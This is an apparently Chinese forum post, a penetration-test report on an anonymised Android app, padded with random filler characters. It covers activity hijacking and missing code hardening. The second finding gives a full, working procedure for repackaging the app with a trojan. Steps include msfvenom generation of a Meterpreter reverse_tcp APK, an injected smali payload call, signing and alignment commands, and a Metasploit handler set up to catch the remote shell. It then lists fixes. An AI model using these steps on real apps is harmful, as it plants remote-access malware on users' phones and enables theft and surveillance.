V' ? {. O# C' e( M# p! q# d: J! }

3 `& H" a9 E! B3 j/ s: V 0 s9 J- ~' j+ K 2 检测结果                    ) g: r+ U' t4 A % [& x7 m. y+ S- |2 }. b$ I% E

' D: G; B2 D1 `8 v! K' W1 c: x' G! {, O, }* g8 s% z) X8 P( I

( b$ ~, E4 N, @8 F L ( ~/ q( ?4 h- x* o! `- h 2.1 某某某 2 o# S, V" r a' o ! P2 b" _) j5 j" `+ c3 q% Q

" y q; f4 n j$ d0 r1 }) K$ W 6 S) s- J4 z; c- P* r

. W3 v- Z7 O! B$ c0 D8 k ( W, q O) N3 g; {+ j( r 2.1.1检测目标 q! s5 o7 u7 S: |) M 3 K$ M9 d) C0 A8 H; Y

. o+ u! `( d3 E; w- ~7 J% A " h! O$ {" P, S+ l; v. T% I" @

+ b' e) _* j5 y9 i. j ; Y, W8 W2 E& J# ^0 V0 x6 ` 目标地址: 某某某某某某APP 3 B' }4 e' s# j1 C) A - M# t; Z- _! g

1 e) M2 ]+ ], |' i) I ) V& ~6 ~* I/ G, Q, o

+ @# o. h; T2 {' V - y! F" z) \% Y& c6 v% P; i/ p6 f 2.1.2检测结果 0 t" d! J! r, V. t ! D# C3 N# {* A8 X! u6 u

; _ X; f6 V. |( }( _ c# m6 A! `5 o/ j! m

! d% S i: v' k; P5 h% u' G2 \2 h0 ^$ c* M+ |/ r3 d1 b7 r) H 2.1.2.1 3 w% H, u5 ?1 q 3 P2 d/ g( T' v/ ~4 f- q! S# c2 b# j

0 D* W) R8 A: S" S( M/ c0 L6 _8 u3 s4 Z2 [, z

: i6 j& O, |# s4 Y9 ]- I / s: D0 ] {4 n ] 漏洞链接地址:某某某某某某APP # N- v% Q. K7 m9 O, R % C) C2 J# D# G) R4 e4 c2 B: m

3 O n- ~4 c9 \. M. n8 n ! W+ y% N% C9 k3 P. k$ t M( S

/ m5 @& V3 l: n4 A& R 7 Z: _ P6 `) j# p H, N   9 k5 W* R2 f% b' D 9 a( S0 K) C6 h2 L, Y

; r8 d0 j. x) S" S, |: M3 z " f0 ~& r* {5 U/ `" \1 o

# V" [1 R# A. U ; N8 m4 }" _1 @ 漏洞分析及取证: & P2 u" x5 F8 U2 f! t! x* ] p( j" g# j" \

w. X- V8 T0 ?9 J! c" W( w6 o * |2 K+ ^ m4 H8 ^* f/ o0 [" Q

0 H1 l, H& J2 X8 j# F% E( @0 x8 W, `. Q 4 i! M9 @8 y4 K- u5 C3 R                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ( i; |+ k8 T1 m6 q$ V3 s7 N9 v7 {% ?1 H3 t

! {/ a) w6 ]$ u6 g" C: T : B* e3 I# a8 C4 W: y

* m8 F$ H9 y% D9 V% n' y7 N 8 ^# C& d2 n# E4 Q) F      , |* O& k- E5 N7 M# J' A 9 b; \5 P7 M/ i! y6 x9 T3 I

! T9 \4 v# _4 y6 j1 v- P6 A$ D* ~

: e) s& Y* W6 K n9 w/ k + ^! a# r8 k$ j7 q! T' `4 X2 H: W4 R                       % b5 h0 z. ]) y- s7 i ; Q- n4 _; i! Z) V' ?( G, X

. r( t) y6 L8 J+ y9 P) w7 ~9 N! z( N j5 ^

, _% v0 m0 f C: t$ c' Z - u& {7 f" t r, v" G6 R 7 j; T1 E( p& j1 b, i) E9 S- _7 @) T; @: f1 L6 G3 T, c2 L$ I

# }2 Y1 x' H1 @3 {+ O7 L4 E 3 ]$ u& v% b+ ?; w

L4 z/ n( W, E6 E) L6 d5 [8 _ 5 n3 Z( z8 A$ {( ?- B3 ^0 u" k, X * L1 k4 ]# ?' H; _0 A! C5 s9 I' m9 v+ N

' \& q: Q/ G6 @5 E4 e& q : p8 |+ |* \6 a$ w/ ^

, A4 @6 ?4 l" `. l8 {; t * u3 _% L9 @$ U; W6 r. N8 d : O! i: ~, o( T& L6 Y ) w, Y6 }& z* }$ H+ G, R. f- X

' F- G& J# e. ]2 e% e- S ) Y" q: L* r! @( }! \, p

+ s" B% L5 x9 g7 ?+ ?" H+ W; V( `) V& w1 K3 D# w1 z 漏洞危害:高 ) k' M/ [5 _0 X1 B ' v5 K8 P; v& u* _

% m0 p& s+ l4 x4 J& E2 Z * e6 P* Z; } a! [
) w; @. k* j5 y+ C/ S& |# I7 E6 ? ! C( X* L1 I8 T i. [# e) O5 K5 H" _- C! T$ c& V4 z# d: y, B* V/ {& C9 g8 A% p! c( C% v1 Y3 @4 [& j% F$ u# ]$ @: P0 F& w o' t5 Y$ U" D# U4 o- ]3 X7 l3 O) m- z/ q" |! ^/ j) Y8 Y# R% h# X- G& w$ e% |3 S& k j) F0 c5 S' h. K4 ?! n2 {6 t5 M% E6 U1 E) L1 h. s" O( ]5 J" A L* H# e( T% Y/ L/ w* R( u- v2 L0 D. G, d2 D) _5 o: I$ x6 N& H1 M4 Z# w1 e( f0 ^$ y( e! ?+ p$ N- B0 g7 p+ a' c4 U. @9 R# ]' T# T# g- ^1 n; F* v9 J! q6 n- |' Z4 r. h( R* y, {- d9 f6 v5 }; I, l! ?. H9 e0 r' u8 F; J+ G" n( x2 V1 o7 n0 {0 f: H+ M6 w' R3 o( V+ u) ^3 M) U; E* ]0 L4 h6 w$ q4 M- x2 }! [; M' R/ D4 g( t* v% V1 t+ T7 x) d* z6 u0 A
; S6 P# [# e2 a * [' Z6 m- M1 {7 A D% D* _$ x

/ Y0 X/ f8 b* C- d) \! ]& ~( M ; A I! r" M3 x' b6 s( ~ 严重程度 & o. K2 i% F! D. S1 Z7 m8 ]6 f/ N' b" D- v( ?

$ l& i8 \4 f6 E+ t 3 o4 C2 @/ D) _! b8 v, l I
0 \0 K( p& Q, S/ Z! q3 x7 m9 {8 T" t$ @5 j

% A. R d4 d) Q! \: D$ K, W2 x4 x3 n8 h: n. e+ {& F- [ } i7 }/ C. R# o ) x1 _7 Q( z; d9 f( Y

+ o! q8 Z @0 C( p % z3 I5 Z3 p( h' [- ?
! N" u6 }& p4 A, ^# x ' [# E. A j0 C2 s) E

" I5 V. ?$ Q- F- @ / t/ L0 \- |. x * c* L3 `" i3 j/ I! x" e& h$ i7 b+ |) O5 \, l5 A

- t% p% b- ], }4 O9 x: m$ ]( ]) w0 d+ _/ g' y* [
: A0 z! i: m, P $ L" ]9 Z% v; Q

! y+ T4 x" n7 f$ a 6 E9 m; O; G/ b- X v5 `) I 6 f" o, P5 x1 |* p0 E 9 B T6 D0 v# c% k* K

9 |/ I( F% r* m) `: ]2 i: p2 [! k9 x9 m, S- M: o ~" k% L$ _$ w4 c
* w3 v7 a2 Y, I# ? # W+ l1 P4 I# V3 D; P) N+ z

/ f& O2 `9 @' Q' w; e$ M) a3 D9 e9 e \. r" i1 u   $ J. g: D9 U) `& f# y4 _7 p ' Y8 A }" `8 X7 c% l1 |: K

1 I6 J( j: d4 F; [9 G ! d0 I9 ^" i- l/ h' } e2 L- r" e
9 D3 F3 [, w9 X ~$ K * w" f$ X# }0 \5 }; [ q

% t- q" ~+ e) g. u2 H5 O 8 R. j' n" m: I9 Y: X6 L% y- } ' ~/ T: y' _3 f, t7 e; i 0 l! @* Q; l6 ]0 }& ?

1 e: c' s8 K ~! d + j$ j; z& g* R) F" R4 p3 m. V) C
& a3 F, b8 X" |1 s) h0 _/ ~7 U7 S3 c* T3 x. v

# f- J8 d& T; i; m3 P4 _6 o) _- _: X9 v t0 {   @" e. |" o6 J" X9 T8 z& j; k7 |' ?. w

4 a% L( p5 R: _/ \) t9 o* }( M7 X) }% I+ z+ t) x9 u: X8 _! A" V: J
5 \- e7 q% t' ~$ K; ~$ {* |2 z, ~, e' A- K% ~- G/ C
1 K/ k2 S7 e5 X2 N / P9 [ e( B; Y. p- G6 C

% t4 k! u3 w4 [) j4 P% w% \ - N9 _" x k: f3 {1 B1 s   2 x5 _1 u: V4 c; k& z% Y) C 0 S3 ]. c& I+ B; X' H

* o5 p5 Y' e9 I, E. V' B 9 K$ F" J, \: m! [. h9 b

8 R0 q( ]. v/ a* R! a- M. T3 B5 o) F3 y4 v2 g 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ; V: S2 O, ^6 t2 T 1 [) U/ q, h% H! `2 r( a

: c% V4 M% i2 _# Z+ q; I S5 q( a( d7 V9 B

" j7 F: p% C i* ~8 J" Q) l0 ?% F+ U: ]5 x           * H+ {& `0 f% L- I" B) _- `1 h# k4 B) a y; _9 S7 A

- p5 D: \: q0 h/ z) O; r% V7 \$ s + R* u% h7 q' Q

9 M1 d2 Z7 b6 f4 s/ e2 u& a$ L* f1 D9 h" y' J- U+ K' P   5 l8 I* V, v( Q6 R7 o" t, O0 s1 I4 E7 _

( j9 Y( @9 N% F) |4 t# D+ E3 d! g9 K - Q* P0 ]3 T% n) c9 X) d9 ^

. j6 K2 ]: v5 ?9 a5 ^$ |# K ) l& K: q' K- \/ b% H8 \) J 2.1.2.2 # u) Y3 J1 x: i1 U4 O 1 x7 I+ d, W7 c! k

& M+ N! k2 A; l* I( a t/ B- ^2 _# L/ Z! r4 s& S7 s- U

: e: d: f: b P" C& Q( ~. X0 M0 P " j3 h$ z( Q4 q& ] 漏洞链接地址:某某某某某某APP % z! @. r3 D' b4 D0 h. F; Y( p# h/ P5 }

; Y& E. j! O* \# V/ t3 R8 q1 W4 G 4 u5 E# y I: e) E4 g k7 h# U

4 r# A" T9 H( Q- O, y$ i/ E , t/ M3 t) d5 M) v$ J2 g1 T 漏洞分析及取证: ) U- f5 h! N1 o) c5 H" C / m: a2 y9 H. V* Q1 |

) U$ D% ?: I ]4 [8 F ) m' i. V+ Y3 D* y! F

1 d7 ?9 r! T0 N 5 {! U$ B6 C$ z, @                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 B' U7 f( y8 D) ^ A9 I9 I9 Q$ _3 X) f1 g

' S5 Q: L3 T% B1 M + |' z& R2 q" \8 s( \# c, \4 Q& M8 I

+ N- q; b+ h4 M' q1 N5 B; m , Y* w3 G b( N2 i* T* w+ a& R Metasploit 生成木马 apk 7 w0 p! X' m2 A8 f+ w$ t/ z6 E1 u! |$ A8 n% y- ?

! y5 D/ f& a X& V$ ~' `4 f p. x- u5 L

9 `2 L$ O4 h$ m$ n% M 8 V; u. \- q0 M0 J, e msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / K- H5 ]* N+ I- k8 [" ] # D0 G, h% o0 P( B

1 {3 P6 _) v" ? & v% y c( P# {& V: Q* r

?7 w6 g. J4 x, r9 [* i% E6 d 8 G3 N" h; s+ L/ S- Q5 L 反编译目标apk和木马apk 6 S2 v4 R/ L d# T- [9 |) R, L, R \1 m3 s9 X5 j

4 O) D4 a$ p1 J" z& r5 X6 P' w% p) K5 b" T& ^! u

) h4 ^! c/ J/ H& v5 r4 R+ H5 \ % b/ G* S4 Z! ]+ D: T# ^- t apktool d target.apk
- m, \0 \! w: m# v( ^+ K: k9 q ' ^/ @& |0 @* W" P, `7 d | apktool d cockhorse.apk
0 a1 ]' e4 D& u' i5 Q6 ` - D& f2 ?& w+ T' B: w, D, s

; Z" Y$ Y# {0 ]( @0 Y3 ~ % l1 ^' \' ?+ c5 L# c

* _. H- u! ?: k/ ]7 U 1 c% f7 ~; U: \; A. m 木马 apk 注入目标 apk * p% O3 ^! A! i: ]' s) l: a$ \ 4 f. I) d2 R7 x3 I" G

, g2 `! [- P& C5 @; |; U1 B 4 _- S7 N3 d7 ?. @

/ ?& Q/ h( ?( T8 e3 R - G6 v3 J) c' Y8 |' N% c4 n 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
& ?' M1 f- Z4 `- ?' Y# V ( P4 o6 _$ k8 R2 f# N$ C0 J* H invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
9 J, ?8 h& _' g0 I7 R! L# x) Q* W* R" w0 U( W: ~

( e3 {$ r6 }! ?% H! v0 G ?+ O* t$ c A; l& a/ X

/ n0 Y' m/ [" f" c: x9 I) [" ]& Q; l# ^* {! {1 L* H 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 % L: U W2 a* B& U 0 }* G! x. i2 p* N0 p$ {

( K' @* b; h# q7 @ : o0 S1 j2 @, r: m$ A

! j) k: Q. F: B. z/ B: A( h! C, j 5 ]: t9 `. W# w" z, g* { 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ; ]% q9 z3 ?8 t/ Q* z2 _% U 3 I) p7 o/ J) O3 o, c8 @3 _9 [

* |/ i/ g; E* s0 _: n 9 P5 l6 r* H1 j' X$ s' w i

& p( h8 _& V9 t & F% A! ], x j2 ] 回编译生成最终 apk ' ]9 e5 h# z1 I 7 q/ @( q5 U% A+ {, r: `

+ E5 p- b+ T8 O 8 N0 U. Q5 H5 O( s, e

1 a: e! f6 @6 g) _1 o3 N9 P ' v' K8 F; c' X: J2 _ 重新打包 0 A! F6 H" { r9 [ + O V! L2 d+ X5 G/ @4 |( b8 P" p

9 G0 Z8 i: K9 v$ n * V3 v/ h* Y7 ]8 l$ F# S

0 P+ q3 v$ q' P3 l9 t5 f , }5 S! J% Q: g6 R; }3 U# E apktool b -o repackage.apk target_app_floder 7 s Z, s; i! F! V: @ , d' r3 l" Y& J0 r5 H* G

/ P, Y0 z- g4 W9 C7 q" v/ a6 Z 6 i* F4 O2 [1 `7 z

3 @9 d+ P9 n2 f$ b8 l: N$ v2 W/ e8 q2 H# A# C) `( ` c 创建签名文件,有的话可忽略此步骤 i8 b" ~. \: r1 n3 I4 _3 Y : F) N* b" i4 \

* P7 Q4 l4 s4 G% j* Z) H6 p 4 l" d9 J2 y( P0 [) e0 u3 k

5 O- t6 i& X, D7 \* H+ E7 j ! {1 t/ n) m4 z- L keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                0 ~) _# _8 B9 b1 I. |2 x& ~6 D( f. U k/ H6 r G a; i' s& D: Y

; N/ B! g0 B8 X8 p9 M * K7 ^% t3 t$ y& A0 ]

7 E% f! D. N; a6 a; t' e( |9 d) @. x. X$ A 签名,以下任选其一 # r/ [4 \1 @. V - C* x0 [0 ^, w) h

" E) x* s, n# d- d# T# q4 |& a* c ' c5 Q1 W4 H& l7 p% b, Q

, F5 G) F' B* s3 y& L! q' t F- U# S3 Q 2 L4 y d* L5 [( v& r jarsigner 方式 + H6 L Y, y+ Z+ J7 m ( f6 `: ]; T- r* W. l* I

/ E: w8 C) p; o4 T 4 p% a' @0 X5 E" P% ]

6 V/ H$ }) k6 L7 I9 w6 i; ^. j9 R1 f4 N/ [# m jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ; Q) V* s- G7 n ) f& t# o- x6 }9 q: M* P4 ?5 u, {* ?

$ E6 n+ ^. @4 S: @6 R& i h, d9 \5 N' T8 w% Z9 T: c4 Y

7 ]. {3 z4 i# ?/ p! b( c4 l0 p2 f! v+ t( ^& G4 ^- M apksigner 方式 $ {& X n8 g% r3 f5 }) m% m2 s7 g

+ q7 N' i. c6 q0 E) _ $ n- n7 m9 `4 k! L# U! N9 u) P' D

! K8 ]) @" Q0 A7 \ L+ v+ A. d/ c apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - Y6 B& R4 z5 V1 W5 J9 ]: P# |3 ^& f2 ~* O

( e! M1 Q) d/ D 6 E+ ^* b# W- h% l+ R4 \) P: o7 ]+ R

; k g& M6 `- \+ t5 ?+ ^ . L a0 ~( s+ ]8 X6 h; l1 \/ V9 ] 如需要禁用 v2签名 添加选项--v2-signing-enabled false # `6 h0 l6 l b; k+ u7 {$ d2 K3 z4 [' p% a/ o) j

7 P, a- X4 b7 \0 L! n 2 e& w) h9 i& ]9 t) e2 T

, \. `5 X: `5 @, }% q i. }1 q ( Y& W E$ S: V, e M* _ 验证,以下任选其一 # S% ~( V& b" G0 b 8 {) }0 e9 o% h; I

& q' ?7 X( b4 N# U: b% l+ ` n: ~) n9 C8 Z$ B5 u l

( M) n7 Q8 K' {- O1 p4 G0 T. ? n3 A9 S5 @. F jarsigner方式 + P* B( H# j+ V [ ) S" _7 p. g9 [* m; U; y( D

& R1 f- i4 s8 p4 K/ q / m* l# a) c( l3 ?# x+ S, c1 b

0 J1 B9 N# a; s& ~4 ~ 7 i* @+ @3 j- O, {+ {! } jarsigner -verify repackaged.apk 3 ^( y0 W! [ ^# o7 _( k& I% K, v ~" d+ h' @

5 m$ C/ K9 K7 q* }. ]2 Y; Y' L5 {( }, ?. b/ ?

+ z. A0 q$ V$ l$ p$ O( e- _" J- h3 s! ~1 Z# A0 I( Z3 B apksigner 方式 . H/ R% o1 C4 X% i2 \( ~ W) c4 s) v- t+ P

/ l2 Z4 a9 D0 g8 x4 T5 m; F |! D& \ 7 D+ ]: M7 O5 E- ^" s* L

6 S. \' X# s/ D! P. d) j3 Z ; S3 j2 p a7 E0 m$ K apksigner verify -v --print-certs repackaged.apk , S2 G2 v; C( t) m8 M4 o" J8 I, a3 G `

: B& w, l8 g% q% ^5 L8 N 8 H. E9 y3 g7 V

/ R/ R3 s" a. v7 ]) F ' ?( K* _, p+ O keytool方式 }* N8 I$ \! A% X 7 z3 r1 S: ]; D2 U

$ y8 @! P0 K% f- u1 e+ N. V5 ^: {# x0 M# O, v2 t

9 z" b6 o1 `( K' ]! A; ~" | ^6 T- ^& S+ o keytool -printcert -jarfile repackaged.apk ; h! ]3 H1 I# [2 n+ C8 h$ E& ~7 I, h7 d0 e, F* Z3 p4 e8 ?

) l( ~; ~9 H) k/ @. ^% I4 c; d4 |0 R

M7 F" M% ^# m: y W 9 J* R* e+ Y x) K 对齐 # X, G, ]# n- i# f. g # ^% a' s7 ?% v' C

# v* I+ x+ y# ^, S! z; e Z- K7 A9 U( l: f

( G1 J) W$ s5 w6 o4 P ; b3 m0 I9 w: |/ M 字节对齐优化 " O7 F# m5 W3 C% f + O$ G) ]/ Q' ^: C; z" Z! J

5 _+ u: Y- v0 J 1 h6 q- l$ m% P0 l% q- l' w

$ \) ^7 y0 k4 S& v! ? $ i; \; J: V% J4 p: R1 [ zipalign -v 4 repackaged.apk final.apk & `: m7 d; ~7 p0 s 0 x' k8 F+ [ a) K! O

8 v% s1 m" i8 h/ l9 X7 g+ Q 0 K/ e" F" C* _; l

( L) Y; J) |$ w7 ^- ]' B6 p $ { O, n8 B) J- M 检查是否对齐 3 v! o1 c6 j# `( h3 N9 a A 4 Y* M2 o9 [! U

$ S# O }1 e7 S: M- _ # A# a2 E1 J* M$ w1 G

( X" n' o6 _" ?- s9 O; x( s- } q7 B ( j7 b ~1 c" J4 c- B zipalign -c -v 4 final.apk , `0 N9 Q! h/ \8 i3 Q: e) M# g 4 b/ @# }' Q0 b) k& I

- C3 k+ e+ O: c% B0 c& u4 t8 P9 n: \/ I

9 c; v- {& O# d' f: ^6 d * E _/ E3 _; V5 j 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 1 K: p4 x! I6 g ) s2 e. ?3 C7 |+ b- c; h

+ q- r& `7 C6 [1 f0 P4 y, d( C: d1 ` ! ]- N! H/ N% ?

% J+ _: U# A! O, H3 ^2 U7 @) |' {- J* v0 F4 X# {( `, q! _6 M { P 启动Metasploit控制台,配置参数等待上线 8 n3 t% Q p ? 4 `* p- |9 T! d! w/ @

1 F8 B/ O1 e+ h: k/ H3 f5 W+ H/ N0 W

: |# e/ y0 l0 I3 ]: e7 g$ x0 E7 X' d4 c1 G8 w5 S 在终端依次输入如下命令 & h. f1 R# K6 w3 ]- S - a6 V, ~* R& N

8 z9 \5 u9 |7 {1 r ) ] V& C! H4 v; P8 s

! m, f9 T F7 f! H - d6 i, Q* O3 h& K, s( V msfconsole ( \) v, `& b: z: ?2 M. | D2 i K% A' \5 H t& h- {

$ t% V% S! @+ K! Y' ^- E! P! R" {" _$ @: J* l

4 L! {+ r4 E/ i0 L . Q+ p3 T- y- X7 H( X0 Q$ o: M' v use exploit/multi/handler 7 V a8 N3 u% W, ]% s( }8 p" j5 ^( N$ r# z: {. e# z- h- ~& Q

9 ~, O, b$ f) d) n5 r+ R! Z6 s) P+ r' r% l2 z8 Z5 h, D `

) `* d2 M1 O8 A# t- X: `; P: j+ k7 d5 w set PAYLOAD android/meterpreter/reverse_tcp ! t- v: N. A, K * X7 u( J: i$ c# X; B/ E5 [$ \

" Q4 x; M) E- G5 S+ W& t: x 4 n+ |( C( o" O" O& U* w( Q) |

4 V+ L4 ?6 W4 A, ?& c# I. A" v ( ^& ?8 r* T: Z' z% C6 F8 O4 k0 x# q0 V set LHOST 192.xxx.xx.xx ' N6 G7 d5 I+ v+ b " q" U, m$ k( C9 X2 B. ^

' K$ e) N8 j5 e& o. W6 y' r2 @+ ~: o

( ~( h) P4 m- D9 g( ~* `9 B3 d/ l* E `2 T5 P5 e set LPORT 4444 5 q4 ~' Y& p& t' _$ N, \0 e' I# @6 {, x: _

- e, ^4 f7 p+ M/ m6 r7 a 7 i5 y* } t# c; b d

8 \ U* x1 V8 b 0 N( g+ V0 D: V% d6 q exploit % z; H2 ?5 B# _- a! y$ J' j* e& b/ s ( ?2 F* r8 D) ~& K5 r3 S' j

4 D! R. a2 U4 b9 v7 y n& J$ J' R" e7 ]. G# I. g

* J6 ^+ |8 k0 C' o: G* u/ s# b4 |; ~! y5 U 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               & F: c2 l$ {( c . o t; x1 ]' Y2 R* ~$ I0 [& I

: T3 \1 M% |( k2 ^' \* e z8 D [ i

" M& }# z: @: g" h0 F 0 w5 j' v; J& l7 b B& d 漏洞危害:中 6 P) N; w0 \* j; I1 @1 g 9 |4 m2 h L4 G% I7 R# q* y

2 p6 m0 {3 e# j7 K. k1 R! R8 p0 y' |) y+ f7 s
$ R% c5 B6 F* Z. z3 Y8 v7 t6 { 7 k! J2 S) B0 N$ l1 y* X : [8 L+ d& ?, z# G% e6 X0 O: z% s) Z, q & v8 R: u$ f2 w7 q/ N5 P4 @" n( f+ i/ f. G' u0 F% [3 v. O1 z" j" A$ O/ C$ Z1 G F5 o6 J0 ?3 E4 J( }( P5 o& s1 s& h# q( y2 E& D- ]* Z- ~4 ], }% l' Q( G0 t1 i4 v; q* S* b) @9 K' j( ]2 o) c9 D% S* Z* B) O j3 l: ~: t3 p g- |. s& H5 e5 |6 R) m$ |2 F) B1 D$ b' i; J9 M7 P$ [+ G1 q5 L+ L. A! y) j* ?/ {7 k( q' y8 X( J9 n c6 {( I, U/ _. S8 D# O7 H+ v1 y9 ^& j* F" f# O# [$ m$ ?! \* l/ r% i+ m& ^7 O2 \3 q, Q, g) z. e; h! X( B3 m- Y7 D/ a Y, A e8 M: g6 o V$ D7 G3 _% _. e8 o2 J' _4 `" Q1 a, O4 E( q' A8 y; {" X/ p6 T, D* Y2 I1 I4 `, C. ^" i6 Z7 g0 d3 H. c# {% r1 e2 O$ U, J! }9 ?2 t' ]" U" [+ D1 x; m6 U
+ ~3 d8 f0 m; F1 ]/ E1 [. [0 [# G T

: I X9 ^ ~$ ~% i ) O; J/ q+ W3 H) s6 M) I7 P 严重程度 ~$ e5 j7 N3 `, q( Z % s) ` V8 P U" c& k6 [& V4 d

# ?* B+ l# K( V& C2 V3 Q + k8 [# @8 Q% R1 n( U1 X1 o, }
6 X! {9 M l& ~' |4 [7 h6 | 7 j `4 I" W5 F

5 a8 S! W8 _% I, T$ p7 d% v" i! t, m, B1 M1 `3 r! m) e ; T* u u& J3 {& f: o N& o6 g # W4 j# c& w, t2 i- A n, n+ T: R

- Y6 p' t* H1 t4 Q$ Y 0 j5 M0 ?, w1 F3 B4 f
0 ^. _- v5 y; c" `5 U6 E* z % n7 t6 G; M* w9 v& ]/ N2 V

4 }$ g% ] @ Z3 L$ e# t' Q , M: I* W2 |, e. _ & L0 D4 s3 O& m8 | ; ]/ m7 x9 q. X) H' L

2 y' S5 ^' {2 N; u, ` 5 a( _! p! O r7 W4 D
3 q6 j# l) I; ~" t% U 2 M% i, V4 P% z, r, v( u

, j6 L- [% {: J; c( g# X1 \" q6 E9 f# ?- T0 v* W ! }6 E3 X, b1 m$ c- B2 g* V ( u; M0 I; L$ X

) |2 B: m6 l. j9 n4 O4 D * F" \5 j1 c. m& W, R
% l8 b) q$ P1 A' Z & Y* h5 k: w% L+ @% W/ l % O. n& k9 x, v7 O+ H: K$ ~0 L- s* C0 Z& G% s, W; `

( a6 s# @! \+ }: F$ s X% r: s) V' o " e. t7 ~6 q+ B   9 R9 ~' E4 c2 s7 V* H2 N / z4 ^" G( U5 Z$ j6 _

1 A( p& \+ x" l7 e2 q + Q+ ^" @! s0 d" O0 C% d6 L' S: A
, |* I) W& N1 h1 q; Z9 n v1 V; e1 i, v3 |( [

$ g3 Q- ]3 V3 \0 k- W7 J 4 ?9 D5 D1 H" A3 Z. R2 ^2 Y J 0 k' t N+ h% s/ w) r% T) S* A: F3 e; H # _; D* } n0 N c5 X; |4 S

0 j7 `3 s$ x- n' n( V5 @- x, z( G- h& u8 a5 O
) B% k X2 f: m8 p8 m8 ~) k1 r, `" U3 p7 U + v- \8 X5 W: i" X7 v' V2 M4 N" ^: p 8 c0 m6 y- V3 y6 }' c, ]7 n

- Z/ I* _9 W) V1 p0 I0 t3 R) K9 {; P: @: j3 U5 P% p- l7 D   6 n, h" T& b) k, A6 s: m; |& |! `9 `1 z0 x' v1 A

0 a. @- g' ]# n- n 0 t( K& T: ]8 a5 q( Z) H
" P, D [5 K; J7 z - v$ i6 g( w' g: P9 u, b
% q0 g4 x( T G* b0 _9 X* P+ t: h0 d

, V/ C$ j& G3 z% K' G: q8 K4 [& _: n6 D5 o9 z   $ Q/ k) D6 G+ j 3 ?2 a9 n$ N4 Y

( w& m- I+ B5 C J0 e7 b. p+ a / F/ v. U) f/ e6 m2 r

/ O/ F6 Z+ @& S/ m# r! ^7 r3 {# X5 { 修复方法: 5 ?1 y+ R4 ?4 S* |4 O6 v8 U- p: a6 ]- Q 9 y( R; F6 ~: H9 s; z) Y" P/ d- V

& Y, x5 g [( i2 |3 w: Z O8 A ; ^ g/ Z' j# r

( E ? w4 D2 Q, e- j+ { 0 Z: V$ @* ~% a               1. APP 启动时应做签名校验防止二次打包。
) L3 m* }0 S! S! `* ]9 {. P$ [# Q: j/ `& K+ m" z 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 # ^* \' N5 ?' P" y: `; j* |) t, B- l9 z, t

" z: A9 o$ |( U; x0 U$ i+ K( c/ N7 {8 {7 C 7 _/ E+ H8 i6 e: b( O ' G) w) p* I+ ]8 _

9 x$ F, I' I: N" g( q5 t+ ]) l1 t: F   : Z5 Z# P" ?8 x2 `$ e ; s2 t' u' W0 z. L$ \/ y7 X) A

/ [# U; G3 n( P- a0 L4 C: Z& Q0 ^8 q* V2 g( j- E9 Z " N' K" {/ m8 g t0 X) R7 g/ d6 o% s9 n

4 z* c O& w1 k& X Z i$ |0 ^) z6 @3 r( \
9 {/ ^5 P6 |2 T. f$ B0 g3 U x# O* }% P5 E( D

5 |7 B, p* L5 v3 r, k " z) Z) ?: l0 F ~( A, U3 t/ ?+ F0 h# T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表